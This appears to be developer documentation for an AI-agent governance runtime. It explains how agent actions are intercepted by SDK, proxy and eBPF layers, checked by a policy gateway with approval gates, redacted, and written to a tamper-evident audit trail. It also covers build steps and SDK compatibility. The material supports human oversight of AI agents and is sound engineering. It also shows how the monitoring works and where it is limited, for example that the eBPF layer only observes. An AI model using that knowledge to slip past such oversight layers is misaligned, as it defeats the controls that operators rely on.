        Agent->>Proxy: outbound HTTPS (MitM)
        Proxy->>RT: forwarded event
    else L3 — kernel
        Agent-->>eBPF: SSL_write / exec / file syscall
        eBPF->>RT: ring-buffer event
    end

    RT->>RT: enrich (pipeline/event.rs)
    RT->>RT: scan + redact (pipeline/enforcement.rs)<br/>fail-closed, oversized ⇒ redact whole
    RT->>GW: CheckAction(CheckActionRequest)
    GW-->>RT: Allow / Deny / RequireApproval
    alt Allow
        RT-->>Agent: pass-through
    else Deny
        RT-->>Agent: error / blocked
    else RequireApproval
        RT->>RT: approval_sink.wait_for_approval<br/>(timeout ⇒ Decision::Pending)
        RT-->>Agent: allow or block on resolution
    end

Key invariants from aa-runtime/src/pipeline/enforcement.rs:

The runtime re-scans every event unconditionally — there is no already_scanned / clean wire marker, and none is honoured.
Enforcement is fail-closed: a field larger than max_field_bytes (default 64 KiB) cannot be fully scanned, so it is redacted whole ([REDACTED:OVERSIZED]) rather than partially forwarded.
The credential scanner / redaction primitives come from the aa-security leaf crate.
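
The fail-closed rule for oversized fields can be sketched as below. The 64 KiB default and the `[REDACTED:OVERSIZED]` marker come from the invariants above; the function names, the `sk-` token prefix, and the `[REDACTED]` replacement text are hypothetical placeholders for the real scanner in aa-security.

```rust
/// Default ceiling per field, as stated above (64 KiB).
pub const DEFAULT_MAX_FIELD_BYTES: usize = 64 * 1024;
const OVERSIZED_MARKER: &str = "[REDACTED:OVERSIZED]";

/// Stand-in for the real credential scanner: replaces words that start with
/// one hard-coded, hypothetical token prefix. The "[REDACTED]" text is also
/// an assumption of this sketch.
fn scan_and_redact(field: &str) -> String {
    field
        .split(' ')
        .map(|word| if word.starts_with("sk-") { "[REDACTED]" } else { word })
        .collect::<Vec<_>>()
        .join(" ")
}

/// Fail-closed enforcement for one field: anything too large to scan fully
/// is replaced whole instead of being forwarded partially scanned.
pub fn enforce_field(field: &str, max_field_bytes: usize) -> String {
    if field.len() > max_field_bytes {
        return OVERSIZED_MARKER.to_string();
    }
    scan_and_redact(field)
}
```

Replacing the whole field avoids the failure mode where a secret sits just past the scanned prefix of a large payload and is forwarded untouched.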

The eBPF layer is observe-and-forward for bypass-detection: it cannot block in-kernel, so it streams audit events while the SDK and proxy layers carry the synchronous allow/deny. For the trust rationale, see three-layer defense.

Where each event goes next

Once a decision is made, the event flows into the audit and storage pipeline — covered in detail on the Data flows page.

Data flows

This page follows the data — not the control decisions — through the system: how an intercepted event becomes a decision, then a durable, tamper-evident audit record. For the decision logic itself, see Key workflows; for the trust view, see the Security Model.

End-to-end: layer → gateway → policy → audit → storage

flowchart TD
    subgraph layers["Interception layers"]
        L1["L1 SDK<br/>(aa-sdk-client)"]
        L2["L2 proxy<br/>(aa-proxy)"]
        L3["L3 eBPF<br/>(aa-ebpf)"]
    end

    subgraph runtime["aa-runtime"]
        IPC["ipc/ — UDS IpcFrame"]
        PIPE["pipeline — enrich + batch"]
        ENF["enforcement — scan + redact<br/>(fail-closed)"]
        PUB["audit_publisher — NATS"]
    end

    subgraph gateway["aa-gateway"]
        POL["PolicyService.CheckAction"]
        AW["AuditWriter (audit.rs)<br/>append-only JSONL"]
        SAN["sanitizer/ — sanitize()<br/>drop 'never store' data"]
        CONS["audit_consumer.rs<br/>JetStream pull-consumer"]
    end

    NATS[("NATS JetStream<br/>assembly.audit.>")]
    JSONL[("per-session JSONL<br/>tamper-evident")]
    PG[("aa-storage-postgres<br/>audit_logs")]

    L1 -->|IpcFrame| IPC
    L2 -->|event| IPC
    L3 -->|ring buffer| IPC
    IPC --> PIPE --> ENF
    ENF --> POL
    ENF --> PUB
    POL -->|decision| AW
    AW --> JSONL
    AW -. dual sink .-> PG
    PUB -->|publish| NATS
    NATS --> CONS
    CONS --> SAN --> PG

There are two paths an audit record can take, and the design is deliberately layered so neither is a single point of failure:

Synchronous decision audit (in-gateway). Every CheckAction decision is appended by AuditWriter (aa-gateway/src/audit.rs) as one JSON line to a per-session JSONL file. The JSONL file is the tamper-evident primary record (hash-chained AuditEntry). When a durable StorageBackend is configured, the writer follows each JSONL append with storage.append_audit_event(...) (the dual-sink path); a storage failure is logged but never stops the pipeline, and a restart can replay missed entries from the JSONL file.
Asynchronous event stream (via NATS). aa-runtime’s audit_publisher publishes audit records to the NATS subject assembly.audit.<tenant>.<agent> and returns control to the agent immediately (fire-and-forget). The gateway’s audit_consumer is a durable JetStream pull-consumer over assembly.audit.> that batches, sanitises, and persists to Postgres.
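
The dual-sink behaviour of the synchronous path, where the primary record is always written and a storage failure is noted but not propagated, can be sketched like this. All names are hypothetical: `DurableSink` stands in for the storage backend, a `Vec<String>` stands in for the per-session JSONL file, and `FlakySink` is a test double that simulates an intermittent outage.

```rust
/// Secondary sink abstraction; `Err` models a storage outage.
pub trait DurableSink {
    fn append(&mut self, line: &str) -> Result<(), String>;
}

/// Writer that treats the in-order line log as primary and storage as best-effort.
pub struct DualSinkWriter<S: DurableSink> {
    pub primary: Vec<String>, // stands in for the per-session JSONL file
    pub secondary: S,
    pub secondary_failures: u64,
}

impl<S: DurableSink> DualSinkWriter<S> {
    pub fn new(secondary: S) -> Self {
        DualSinkWriter { primary: Vec::new(), secondary, secondary_failures: 0 }
    }

    /// Append to the primary first; a secondary failure is counted, not propagated.
    pub fn write(&mut self, line: &str) {
        self.primary.push(line.to_string());
        if self.secondary.append(line).is_err() {
            self.secondary_failures += 1;
        }
    }
}

/// Test double that fails every second append.
#[derive(Default)]
pub struct FlakySink {
    pub stored: Vec<String>,
    calls: u64,
}

impl DurableSink for FlakySink {
    fn append(&mut self, line: &str) -> Result<(), String> {
        self.calls += 1;
        if self.calls % 2 == 0 {
            return Err("storage unavailable".to_string());
        }
        self.stored.push(line.to_string());
        Ok(())
    }
}
```

Because the primary log stays complete and ordered, any entries the secondary missed can be found later by comparing the two, which is the basis for replay after a restart.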

The audit write path in detail

sequenceDiagram
    autonumber
    participant RT as aa-runtime<br/>audit_publisher
    participant NATS as NATS JetStream<br/>assembly.audit.>
    participant Cons as audit_consumer.rs<br/>(producer task)
    participant Chan as bounded mpsc
    participant Writer as audit_consumer.rs<br/>(DB-writer task)
    participant San as sanitizer::sanitize
    participant PG as audit_logs<br/>(Postgres)

    RT->>NATS: publish AuditEvent (fire-and-forget)
    NATS->>Cons: deliver (pull-consumer, AckPolicy::All)
    Cons->>Chan: send().await (backpressure, never drop)
    Chan->>Writer: drain up to batch_size
    loop per batch
        Writer->>San: sanitize(RawAuditEvent)
        San-->>Writer: SanitizedAuditEvent / HeartbeatUpdate
        Writer->>PG: multi-row INSERT … ON CONFLICT (event_id) DO NOTHING
        Writer->>NATS: ack last message (acks whole batch)
    end

Properties enforced by aa-gateway/src/audit_consumer.rs:

Batching — the writer drains the channel into batches and writes each with a single multi-row INSERT, one DB round-trip and one ack per batch.
Idempotency — each event becomes an AuditLogRecord keyed by its own event_id; ON CONFLICT (event_id) DO NOTHING dedupes retries and intra-batch repeats (bumping aa_audit_duplicates_total).
At-least-once — AckPolicy::All acks the batch’s last message only after the whole batch persists; a failed batch is left un-acked so NATS redelivers after ack_wait.
Backpressure — the channel is bounded; a full channel makes the producer await room rather than drop, so bursts queue durably in JetStream (aa_audit_consumer_channel_depth exposes the in-flight depth).
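
The idempotency property is what makes at-least-once delivery safe: a redelivered batch must not create duplicate rows. The sketch below models the `ON CONFLICT (event_id) DO NOTHING` semantics in memory. `AuditRow`, `AuditTable`, and `insert_batch` are hypothetical names, and a `HashMap` stands in for the `audit_logs` table.

```rust
use std::collections::HashMap;

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct AuditRow {
    pub event_id: String,
    pub summary: String,
}

/// In-memory stand-in for the `audit_logs` table, keyed by `event_id`.
#[derive(Default)]
pub struct AuditTable {
    rows: HashMap<String, AuditRow>,
    pub duplicates_total: u64,
}

impl AuditTable {
    /// Insert a whole batch; rows whose `event_id` already exists are skipped,
    /// mirroring `ON CONFLICT (event_id) DO NOTHING`.
    /// Returns the number of rows actually inserted.
    pub fn insert_batch(&mut self, batch: &[AuditRow]) -> usize {
        let mut inserted = 0;
        for row in batch {
            if self.rows.contains_key(&row.event_id) {
                self.duplicates_total += 1;
            } else {
                self.rows.insert(row.event_id.clone(), row.clone());
                inserted += 1;
            }
        }
        inserted
    }

    pub fn len(&self) -> usize {
        self.rows.len()
    }
}
```

Replaying the same batch after a failed ack therefore changes nothing except the duplicate counter, so redelivery after `ack_wait` is harmless.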

The write-boundary sanitizer

Before anything reaches audit_logs, the consumer runs the write-boundary sanitize() pass (aa-gateway/src/sanitizer/). The sanitizer is the last line of defense and never trusts the inbound shape — it operates on the untyped JSON tree as received:

flowchart LR
    Raw["RawAuditEvent<br/>(untyped JSON)"] --> Strip["strip banned keys<br/>recursively"]
    Strip --> Drop["drop unknown top-level fields<br/>(count them as a metric)"]
    Drop --> Beat{"heartbeat?"}
    Beat -->|yes| Collapse["collapse into<br/>HeartbeatUpdate<br/>(last-seen, not per-beat)"]
    Beat -->|no| Out["SanitizedAuditEvent"]
    Collapse --> Out

Four classes of “never store” data are dropped at this boundary regardless of what an upstream SDK or proxy emitted: raw LLM prompts / completions, full tool-call payloads, eBPF packet bodies, and per-heartbeat sequence records. Counting unknown fields means a newly-emitting sender is noticed rather than silently persisted.
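
The first two sanitizer stages, recursive stripping of banned keys and dropping of unknown top-level fields with a count, can be sketched over a tiny JSON-like tree. The `Value` enum, both key lists, and the function names are hypothetical; the real key sets live in aa-gateway/src/sanitizer/, and the heartbeat-collapse stage is omitted here.

```rust
use std::collections::BTreeMap;

/// Tiny untyped JSON-like tree, enough for the sketch.
#[derive(Debug, Clone, PartialEq)]
pub enum Value {
    Str(String),
    Num(i64),
    Object(BTreeMap<String, Value>),
    Array(Vec<Value>),
}

/// Hypothetical key lists; the real sets live in the sanitizer module.
const BANNED_KEYS: &[&str] = &["prompt", "completion", "tool_payload", "packet_body"];
const KNOWN_TOP_LEVEL: &[&str] = &["event_id", "agent_id", "action", "decision", "details"];

/// Remove banned keys at every depth below `value`.
fn strip_banned(value: &mut Value) {
    match value {
        Value::Object(map) => {
            map.retain(|key, _| !BANNED_KEYS.contains(&key.as_str()));
            for child in map.values_mut() {
                strip_banned(child);
            }
        }
        Value::Array(items) => {
            for item in items.iter_mut() {
                strip_banned(item);
            }
        }
        Value::Str(_) | Value::Num(_) => {}
    }
}

/// Sanitize one event: strip banned keys recursively, then drop unknown
/// top-level fields. Returns how many unknown fields were dropped (the metric).
pub fn sanitize(event: &mut BTreeMap<String, Value>) -> usize {
    event.retain(|key, _| !BANNED_KEYS.contains(&key.as_str()));
    for child in event.values_mut() {
        strip_banned(child);
    }
    let before = event.len();
    event.retain(|key, _| KNOWN_TOP_LEVEL.contains(&key.as_str()));
    before - event.len()
}
```

Working on the untyped tree rather than a typed struct is the point of the design: a field the schema has never heard of is still seen, counted, and dropped instead of slipping through deserialisation.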

Two-layer defense: the sender (runtime enforcement) is the first line — it scans and redacts before forwarding; the sanitizer is the last line — it strips before persisting. Neither trusts the other. See trust boundaries.

Storage data flow

The gateway never talks to a concrete database directly — it goes through the aa-storage trait facade, and the active driver decides where bytes land.

flowchart TD
    GW["aa-gateway"] --> Facade["aa-storage<br/>trait facade + Registry"]
    Facade --> Cache["aa-cache<br/>L1Cache (cache-aside, TTL)"]
    Cache --> Driver{"active driver"}
    Driver --> Mem[("aa-storage-memory<br/>DashMap")]
    Driver --> PG[("aa-storage-postgres<br/>sqlx")]
    Driver --> Redis[("aa-storage-redis<br/>deadpool")]
    Driver --> SQLite[("aa-storage-sqlite-buffer<br/>local write-buffer")]

L1 cache. Read-heavy stores (e.g. the policy store) are fronted by aa-cache::L1Cache, a DashMap-backed cache-aside layer with TTL and stampede protection — concurrent misses for the same key collapse to one backend load.
Driver selection. aa-storage’s Registry + register_builtin_drivers resolves the configured backend at boot; aasm config validate and aasm config boot exercise this loader.
Audit storage shape. audit_entry_to_storage_event (aa-gateway/src/storage/audit_bridge.rs) maps a hash-chained AuditEntry into the storage AuditEvent keyed by event_id; the Postgres driver writes it as a metadata-only audit_logs row (no raw payloads — those were already dropped by the sanitizer).

Summary of the data’s journey

Stage	Component	Form of the data
Observe	L1/L2/L3 layer	agent action → `aa-proto` event
Normalise	`aa-runtime` pipeline	`EnrichedEvent`
Redact	`aa-runtime` enforcement	secrets scanned, oversized redacted whole
Decide	`aa-gateway` policy engine	`Allow` / `Deny` / `RequireApproval`
Record (sync)	`AuditWriter`	hash-chained JSONL line (+ optional dual sink)
Publish (async)	`audit_publisher` → NATS	`assembly.audit.<tenant>.<agent>`
Sanitise	`sanitizer::sanitize`	“never store” data stripped
Persist	`aa-storage-postgres`	`audit_logs` row, deduped by `event_id`

Building & contributing

This page is the short version of building, testing, and linting the workspace. The authoritative source is CONTRIBUTING.md at the repo root; read it before opening a pull request.

Prerequisites

Rust stable (≥ 1.75) — install via rustup.
cargo-nextest — cargo install cargo-nextest (the test runner).
cargo-deny — cargo install cargo-deny (license / advisory checks).
Lefthook — brew install lefthook (macOS) or see the Lefthook install guide. The hook configuration lives in lefthook.toml.

Setup

git clone https://github.com/ai-agent-assembly/agent-assembly.git
cd agent-assembly

# Install git hooks (fmt, clippy, deny on commit; doc on push)
lefthook install

# Verify the workspace builds
cargo build --workspace

# Run the full test suite
cargo nextest run --workspace

Common commands

Task	Command
Build everything	`cargo build --workspace`
Full test suite	`cargo nextest run --workspace`
Tests for one crate	`cargo nextest run -p aa-gateway`
A single test	`cargo nextest run -p aa-gateway budget::types::tests::provider_variants_are_distinct`
Format	`cargo fmt --all`
Lint	`cargo clippy --all-targets -- -D warnings`
License / advisory check	`cargo deny check`
Docs	`cargo doc --workspace --no-deps`

Notes:

eBPF crates (aa-ebpf*) compile with target-specific toolchains; cargo check -p aa-ebpf is sufficient on non-Linux environments. The out-of-workspace BPF crates (aa-ebpf-probes, aa-ebpf-programs) are built by aa-ebpf/build.rs via aya-build and cannot be selected with cargo -p.
The CLI binary is aasm (shipped by aa-cli); smoke-test it with ./target/debug/aasm <subcommand>.

Faster builds (optional)

The dev profile already builds dependencies at opt-level = 1 with line-tables-only debuginfo, so warm rebuilds link faster while backtraces stay readable — no setup needed. A faster linker is opt-in: install it and uncomment the block for your platform in .cargo/config.toml (mold + clang on Linux, lld via brew install llvm on macOS).

Commit & branch conventions

Branches: <version>/<ticket-number>/<short-summary>, e.g. v0.0.1/AAASM-42/add_agent_registry.
Commits: Gitmoji-prefixed, <emoji> (<scope>): <imperative summary>, one logical unit per commit, bisectable. Example: ✨ (aa-core): Add AgentId newtype wrapper.

Adding a new crate

Run cargo new --lib aa-<name> from the repo root.
Add aa-<name> to the members array in the top-level Cargo.toml.
Inherit workspace metadata (version.workspace = true, etc.) and use the shared [workspace.lints.clippy] rather than redefining clippy lints per-crate.

API reference

Build and browse the Rust API docs locally. The authoritative reference lives in rustdoc, generated directly from source — there is no hand-written API doc to drift out of date. Generate the whole workspace and open it in one command:

cargo doc --workspace --no-deps --open

The rest of this chapter covers the flags that matter and maps each crate to its rustdoc entry point.

Generating rustdoc locally

The whole-workspace rustdoc is built with cargo doc. The pre-push lefthook hook also runs this command, so the docs are guaranteed to compile on master.

# Build rustdoc for every workspace member without recursing into transitive deps.
cargo doc --workspace --no-deps

# Same, but also opens the index page in the default browser.
cargo doc --workspace --no-deps --open

# Document private items too — useful when working inside a single crate.
cargo doc -p aa-gateway --no-deps --document-private-items --open

The HTML output lands in target/doc/. Open target/doc/aa_core/index.html (or any other crate’s index) directly if you’d rather not use --open.

Note on eBPF crates: the aa-ebpf* crates require a nightly toolchain to build the BPF target. CI excludes these crates from the standard build matrix and validates them in a dedicated job. For rustdoc on macOS or other non-Linux machines, run cargo doc --workspace --no-deps --exclude aa-ebpf to skip them.

Per-crate API surface

Once rustdoc is built (target/doc/<crate>/index.html), the most-used entry points are:

Crate	rustdoc entry	Highlights
`aa-core`	`target/doc/aa_core/index.html`	Domain newtypes (`AgentId`, `TeamId`), `ActionType` enum, common traits
`aa-proto`	`target/doc/aa_proto/index.html`	Generated protobuf message types — wire format source of truth
`aa-runtime`	`target/doc/aa_runtime/index.html`	Tokio runtime wrapper, agent lifecycle hooks
`aa-proxy`	`target/doc/aa_proxy/index.html`	MitM HTTPS proxy primitives
`aa-gateway`	`target/doc/aa_gateway/index.html`	Policy engine, agent registry, budget tracker
`aa-api`	`target/doc/aa_api/index.html`	HTTP layer with `utoipa`-generated OpenAPI spec
`aa-cli`	`target/doc/aa_cli/index.html`	`aasm` operator binary surface (clap commands)
`aa-sdk-client`	`target/doc/aa_sdk_client/index.html`	Shared SDK runtime-client (UDS transport, codec, lifecycle) the Python/Node/Go shims wrap
`aa-wasm`	`target/doc/aa_wasm/index.html`	wasm-bindgen surface for in-browser embedding
`conformance`	`target/doc/conformance/index.html`	Cross-SDK protocol vector harness
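
Every entry path in the table above follows the same rule: rustdoc writes each crate to a directory named after the crate, with the hyphens of the Cargo package name replaced by underscores. A small sketch of that mapping, using a hypothetical helper name, and assuming the library target keeps the default name derived from the package:

```rust
/// Maps a Cargo package name to its rustdoc index page under `target/doc/`.
/// Assumes the crate uses the default library name, where Cargo turns
/// hyphens in the package name into underscores.
pub fn rustdoc_index(package: &str) -> String {
    format!("target/doc/{}/index.html", package.replace('-', "_"))
}
```

For example, `rustdoc_index("aa-sdk-client")` yields `target/doc/aa_sdk_client/index.html`, matching the table row for that crate.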

The HTTP API (served by aa-api) additionally publishes a generated OpenAPI v1 spec. Validate the spec with npx @stoplight/spectral-cli lint openapi/v1.yaml.

Hosted documentation (deferred)

Publishing rustdoc to docs.rs and the mdBook to GitHub Pages is out of scope for v0.0.1. Both are tracked as follow-up Stories under Epic AAASM-13. Until then, run cargo doc --workspace --no-deps --open and mdbook serve docs --open locally.

Last updated: 2026-06-11 by Chisanan232

Version Compatibility Matrix

This document tracks which versions of aa-runtime are compatible with each SDK version. Update this file whenever any component version changes — see CI enforcement below.

CI enforcement for SDK version changes is pending cross-repo CI integration. Until then, SDK version bumps must be accompanied by a manual update to this file.

Compatibility Matrix

`aa-runtime`	Python SDK (`aa-ffi-python`)	Node.js SDK (`aa-ffi-node`)	Go SDK (`aa-ffi-go`)	Protocol Version
v0.0.1-alpha.1	v0.0.1-alpha.1 (PyPI `0.0.1a1`) ✓	v0.0.1-alpha.1 ✓	v0.0.1-alpha.1 ✓	protocol/v1
v0.0.1-alpha.2	v0.0.1-alpha.2 (PyPI `0.0.1a2`) ✓	v0.0.1-alpha.2 ✓	v0.0.1-alpha.2 ✓	protocol/v1
v0.0.1-alpha.3	v0.0.1-alpha.3 (PyPI `0.0.1a3`) ✓	v0.0.1-alpha.3 ✓	v0.0.1-alpha.3 ✓	protocol/v1
v0.0.1	v0.0.1 ✓	v0.0.1 ✓	v0.0.1 ✓	protocol/v1

Legend:

✓ Compatible — fully supported
⚠️ Partial — works with known limitations (see notes)
✗ Incompatible — do not use together
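
The matrix pairs each Git tag with a differently spelled PyPI version (`v0.0.1-alpha.1` and `0.0.1a1`). That spelling follows the PEP 440 pre-release form, where `alpha` becomes `a` and `beta` becomes `b`. The sketch below illustrates the mapping only; the function name is hypothetical and this is not the release tooling the project actually uses.

```rust
/// Converts a tag such as `v0.0.1-alpha.1` into its PEP 440 spelling `0.0.1a1`.
/// Returns `None` for pre-release labels this sketch does not recognise.
pub fn to_pypi_version(tag: &str) -> Option<String> {
    // The leading `v` is a tag convention, not part of the version itself.
    let version = tag.strip_prefix('v').unwrap_or(tag);

    match version.split_once('-') {
        // No pre-release part: `0.0.1` is already valid PEP 440.
        None => Some(version.to_string()),
        Some((release, pre)) => {
            // Pre-release part is expected as `<channel>.<number>`.
            let (channel, number) = pre.split_once('.')?;
            let short = match channel {
                "alpha" => "a",
                "beta" => "b",
                "rc" => "rc",
                _ => return None,
            };
            if number.is_empty() || !number.chars().all(|c| c.is_ascii_digit()) {
                return None;
            }
            Some(format!("{}{}{}", release, short, number))
        }
    }
}
```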

Minimum Supported Runtime Version per SDK

SDK	Minimum `aa-runtime` Version
Python SDK (`aa-ffi-python`) v0.0.1	aa-runtime v0.0.1
Node.js SDK (`aa-ffi-node`) v0.0.1	aa-runtime v0.0.1
Go SDK (`aa-ffi-go`) v0.0.1	aa-runtime v0.0.1

Supported Protocol Versions per Runtime

A runtime version may support multiple protocol versions to allow SDK upgrades without simultaneous runtime upgrades.

`aa-runtime` Version	Supported Protocol Versions
v0.0.1-alpha.1	protocol/v1
v0.0.1-alpha.2	protocol/v1
v0.0.1-alpha.3	protocol/v1
v0.0.1	protocol/v1

Dual-URL SDK configuration

Starting with the v0.0.1 SDK line, every SDK accepts two endpoint fields so a single install can target either a single-host OSS deployment or a split enterprise deployment (gRPC gateway and HTTP control plane on different hosts).

Field (Python / Node / Go)	What it addresses	Scheme
`gateway_url` / `gatewayUrl` / `WithGatewayURL`	gRPC endpoint of the gateway	`host:port`, no scheme
`control_plane_url` / `controlPlaneUrl` / `WithControlPlaneURL`	HTTP base URL for the control plane — `aa-api` (OSS) or the FastAPI cloud (enterprise)	full URL with scheme

The HTTP control plane serves agent registration, policy checks, and topology edges (POST /agents/{id}/register, POST /agents/{id}/policy/check, POST /topology/edges). The gRPC transport carries the streaming op-control, lifecycle, audit, and approval flows and always reads gateway_url.

Backwards-compatible default

control_plane_url is optional. When it is not set, each SDK defaults it to the resolved gateway_url, so a single-host OSS dev install keeps working with only one endpoint configured — the pre-feature behaviour is preserved exactly. It only needs a distinct value when the HTTP control plane and the gRPC gateway live on separate hosts (the production enterprise topology).

Resolution order and environment variables

Each field resolves as explicit init argument > environment variable > unset:

Field	Environment variable
`gateway_url` / `gatewayUrl` / `WithGatewayURL`	`AA_GATEWAY_URL`
`control_plane_url` / `controlPlaneUrl` / `WithControlPlaneURL`	`AA_CONTROL_PLANE_URL`

If control_plane_url is still unset after this chain, it falls back to gateway_url as described above.
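
The resolution chain and the fallback can be summarised in a few lines. This is a sketch of the documented behaviour, not code from any SDK: the `Endpoints` struct and both function names are hypothetical, and the environment is passed in as a closure so the logic can be exercised without touching real process variables.

```rust
/// Endpoints an SDK ends up with after resolution (hypothetical type).
#[derive(Debug, PartialEq)]
pub struct Endpoints {
    pub gateway_url: Option<String>,
    pub control_plane_url: Option<String>,
}

/// Resolves one field: explicit init argument first, then the environment.
fn resolve_field(explicit: Option<&str>, env_value: Option<&str>) -> Option<String> {
    explicit.or(env_value).map(str::to_owned)
}

/// Applies `explicit > environment > unset` to both fields, then falls back
/// from `control_plane_url` to the resolved `gateway_url`.
pub fn resolve_endpoints(
    explicit_gateway: Option<&str>,
    explicit_control_plane: Option<&str>,
    env: impl Fn(&str) -> Option<String>,
) -> Endpoints {
    let env_gateway = env("AA_GATEWAY_URL");
    let env_control = env("AA_CONTROL_PLANE_URL");

    let gateway_url = resolve_field(explicit_gateway, env_gateway.as_deref());
    let control_plane_url = resolve_field(explicit_control_plane, env_control.as_deref())
        // Backwards-compatible default: reuse the gateway endpoint.
        .or_else(|| gateway_url.clone());

    Endpoints { gateway_url, control_plane_url }
}
```

In real use the closure would be something like `|key| std::env::var(key).ok()`. The sketch copies `gateway_url` verbatim on fallback; how each SDK turns a scheme-less `host:port` into an HTTP base URL is not covered here.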

Canonical `AA_` prefix and the deprecated `AAASM_` alias

AA_* is the canonical environment-variable prefix across all SDKs — AA_GATEWAY_URL, AA_CONTROL_PLANE_URL, and AA_API_KEY. New configuration should always use this prefix.

The legacy AAASM_* prefix — used by the older zero-config gateway resolver in each SDK — is a deprecated alias. It is still honoured for backwards-compatibility, but reading a value from an AAASM_* variable emits a deprecation warning, and the alias will be removed in a future major version. Migrate to the AA_* names.

This prefix reconciliation is tracked across the SDKs under AAASM-3019; sibling subtasks update the Python, Node, and Go resolvers.
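
A resolver that honours the deprecated alias might look like the sketch below. Several details are assumptions rather than documented behaviour: that each legacy name mirrors the canonical suffix (for example a hypothetical `AAASM_GATEWAY_URL`), that the canonical `AA_*` value wins when both are set, and the wording of the warning. The `Lookup` type and function name are illustrative only.

```rust
/// Outcome of looking up one setting under both prefixes (hypothetical type).
#[derive(Debug, PartialEq)]
pub struct Lookup {
    pub value: Option<String>,
    /// Present only when the value came from the legacy `AAASM_*` name.
    pub warning: Option<String>,
}

/// Looks up `AA_<suffix>` first, then the deprecated `AAASM_<suffix>` alias.
/// Assumption: canonical wins when both are set; the source does not say.
pub fn lookup_with_alias(suffix: &str, env: impl Fn(&str) -> Option<String>) -> Lookup {
    let canonical = format!("AA_{}", suffix);
    let legacy = format!("AAASM_{}", suffix);

    if let Some(value) = env(&canonical) {
        return Lookup { value: Some(value), warning: None };
    }
    match env(&legacy) {
        Some(value) => Lookup {
            value: Some(value),
            warning: Some(format!("{} is deprecated; use {} instead", legacy, canonical)),
        },
        None => Lookup { value: None, warning: None },
    }
}
```

Returning the warning as data, instead of printing it, leaves the choice of logging channel to each SDK.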

Per-SDK notes

Python (AAASM-2028) — control_plane_url is a keyword argument on init_assembly, threaded into GatewayClient (httpx). The gRPC path (op_control) continues to read gateway_url.
Node (AAASM-2029) — controlPlaneUrl is an optional field on AssemblyConfig. When set, the gateway client routes its HTTP traffic at it; the gRPC transport (op-control) keeps using gatewayUrl.
Go (AAASM-2030) — assembly.WithControlPlaneURL stores the value on the runtime options for parity with the other SDKs. The Go SDK has no HTTP control-plane caller today (lifecycle is delegated to the aasm runtime), so the field is in place ready for the first HTTP caller; gRPC dial behaviour is unchanged.

Authoritative strategy source

The enterprise-vs-OSS connectivity strategy — why the second field exists, the transport split, and the per-SDK survey — is owned by agent-assembly-enterprise/docs/sdk-compatibility.md (filed under AAASM-1953). This section documents the OSS-visible surface of that convention; the enterprise doc is the authoritative source for the strategy.

CI Enforcement

A CI check (compat-matrix-check) enforces that this file is updated whenever version-carrying files change in a pull request.

Currently enforced (monorepo scope):

Cargo.toml (workspace root)
crates/*/Cargo.toml (all crate manifests)

Deferred — pending cross-repo CI integration:

sdk/python/pyproject.toml (Python SDK)
sdk/node/package.json (Node.js SDK)
sdk/go/go.mod (Go SDK)

Until cross-repo CI exists, SDK version bumps require a manual update to this file before merging.
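
The rule that compat-matrix-check enforces can be stated as a predicate over the list of files changed in a pull request. The sketch below illustrates that rule and is not the actual CI script. In particular, `MATRIX_FILE` is a hypothetical path chosen for the example, and only the two currently enforced patterns are modelled.

```rust
/// Hypothetical repo path of this matrix file; an assumption for the sketch.
const MATRIX_FILE: &str = "docs/src/compatibility.md";

/// True for the currently enforced version-carrying files:
/// the workspace-root `Cargo.toml` and `crates/*/Cargo.toml`.
fn is_version_carrying(path: &str) -> bool {
    if path == "Cargo.toml" {
        return true;
    }
    // `crates/*/Cargo.toml` means exactly one directory level under `crates/`.
    let parts: Vec<&str> = path.split('/').collect();
    parts.len() == 3 && parts[0] == "crates" && parts[2] == "Cargo.toml"
}

/// The check passes when no version-carrying file changed, or when the
/// matrix file changed in the same pull request.
pub fn matrix_check_passes(changed: &[&str]) -> bool {
    let touches_versions = changed.iter().any(|p| is_version_carrying(p));
    let touches_matrix = changed.iter().any(|p| *p == MATRIX_FILE);
    !touches_versions || touches_matrix
}
```

Extending the check to the deferred SDK manifests would mean adding their paths to `is_version_carrying` once cross-repo CI exists.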

How to Update This File

When bumping a component version:

Add a new row to the Compatibility Matrix table for the new version combination.
Update the Minimum Supported Runtime Version table if the minimum changes.
Update the Supported Protocol Versions table if the runtime adds or drops protocol version support.
Commit the change in the same PR as the version bump.

See versioning.md for the full versioning and deprecation policy.

Workspace changes (non-version bumps)

PR / Ticket	Change	Compatibility impact
AAASM-107	Added `conformance` workspace crate (test infrastructure, not shipped)	None — internal tooling only
AAASM-39	Added `aa-ebpf-common` workspace crate (shared eBPF types, not shipped standalone)	None — internal shared types only
AAASM-37	Added `aa-ebpf-common` workspace crate (no_std shared eBPF event types, not shipped as a public API)	None — internal kernel/userspace bridge only
AAASM-39 (impl)	Added exec tracepoint BPF programs, ProcessLineageTracker, ShellDetector, ExecLoader in `aa-ebpf`	None — kernel-level monitoring, not a public API
AAASM-64	Added `aa-ffi-go` workspace crate (Go C-ABI staticlib bindings)	None — new FFI crate, no existing API changes
AAASM-936	Added `examples/aa-devtool-sample-myeditor` workspace crate (sample `DevToolAdapter` impl + plugin authoring reference; `publish = false`)	None — example only, not shipped, depends on existing `aa-core` API surface
AAASM-971	Added `aa-devtool-codex` workspace crate (OpenAI Codex CLI `DevToolAdapter` implementation; `detect()` + `governance_level()` wired in this PR; `generate_managed_settings`, `apply_settings`, `build_launch_command` land in AAASM-978/983/988)	None — new adapter crate, no changes to existing public APIs
AAASM-204	Added `aa-devtool-windsurf` workspace crate (`DevToolAdapter` for Windsurf Cascade; L2 governance via admin settings + MCP registry control; `publish = false`)	None — new adapter crate, no changes to existing public API surface
AAASM-997	Added `aa-devtool-copilot` workspace crate (`DevToolAdapter` for GitHub Copilot — VS Code extension detection, `publish = false`); added `semver` v1 dependency for latest-version selection	None — new adapter crate, no changes to existing public API surface
AAASM-1006	Implemented MCP governance in `aa-devtool-copilot`: `list_mcp_servers()` reads `chat.mcp.servers` from VS Code `settings.json`; `apply_mcp_governance()` filters the server set (keep allowed, remove denied) and sets `chat.mcp.requireApproval: "always"` when deny list is non-empty; `build_launch_command()` returns `LaunchFailed` (Copilot is IDE-resident, not CLI-launchable)	None — implementation only within existing `aa-devtool-copilot` crate; no new crates, no existing public API changes
AAASM-946	Added `aa-devtool-claude-code` workspace crate (`ClaudeCodeAdapter` — detection layer for Claude Code CLI; `publish = false` pending AAASM-201 completion)	None — new crate, no existing API surface changed; depends on existing `aa-core::DevToolAdapter` trait
